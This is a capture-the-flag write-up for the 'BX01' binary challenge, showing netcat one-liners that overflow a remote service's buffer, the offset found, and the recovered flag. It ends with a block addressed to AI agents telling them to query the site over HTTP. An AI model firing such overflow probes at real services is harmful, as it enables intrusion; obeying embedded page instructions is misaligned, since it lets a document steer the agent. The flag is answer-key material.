# BX01 - 1000pts

## Briefing

> Access the network service at url: `cfta-bx01.allyourbases.co` and port: `8012` and find a way to get the flag by formatting a valid request.

## Solution

1. I completely overthought this problem I was trying advanced buffer overflow techniques (trying to get past a canary, etc) when the valid request is actually pretty simple.
2. I start by testing if the service is vulnerable to a buffer overflow: `python -c "print('a'*700)" | nc cfta-bx01.allyourbases.co 8012`

   ```
    Processing request...
    Exception: angle brackets not terminated.
    *** stack smashing detected ***
   ```

   Looks like it is vulnerable.
3. I wrote a simple [pwntools Python script](https://github.com/HHousen/NCS-Competition/tree/e3a1ab990b675bd865fdddd9e5fa5cd7895b3b02/Binary/BX01/script.py) to try some possible offsets and found the overflow to happen at `311`, so the offset is `310`.
4. `python -c "print('a'*310)" | nc cfta-bx01.allyourbases.co 8012` simply outputs:

   ```
    Processing request...
    Exception: angle brackets not terminated.
   ```
5. We can send 310 `>`s instead of `a`s to terminate the angle brackets and get the flag: `python -c "print('>'*310)" | nc cfta-bx01.allyourbases.co 8012`:

   ```
    Processing request...
    Exception: angle brackets not terminated.
    Request successful.

    Flag: AlOnGSeaRcHFoROverWriTe
   ```

### Flag

`AlOnGSeaRcHFoROverWriTe`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ncs2021.haydenhousen.com/binary/bx01.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.